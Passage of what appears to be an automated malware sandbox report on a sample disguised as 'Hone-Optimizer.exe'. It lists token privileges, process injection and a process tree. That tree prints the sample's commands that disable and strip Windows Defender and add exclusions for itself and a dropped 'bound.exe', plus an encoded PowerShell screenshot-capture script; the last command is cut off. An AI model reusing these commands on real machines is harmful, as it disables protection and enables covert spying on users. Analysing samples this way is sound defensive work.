N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3172 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 3172 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 5196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 5812 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2748 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5812 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 5812 wrote to memory of 748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 6028 wrote to memory of 3392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6028 wrote to memory of 3392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 748 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 5528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2128 wrote to memory of 5528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2128 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 3244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2128 wrote to memory of 3244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5196 wrote to memory of 6108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 6108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 6108 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 6108 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5196 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1908 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5196 wrote to memory of 5856 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 5856 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5856 wrote to memory of 5236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5856 wrote to memory of 5236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5196 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4108 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4108 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5196 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1676 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5196 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 5196 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 3596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3520 wrote to memory of 3596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3344 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3344 wrote to memory of 4368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF87.tmp\BF88.tmp\BF89.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\reg.exe

reg add HKLM /F

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"

C:\Windows\system32\reg.exe

reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "Disclaimer"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAI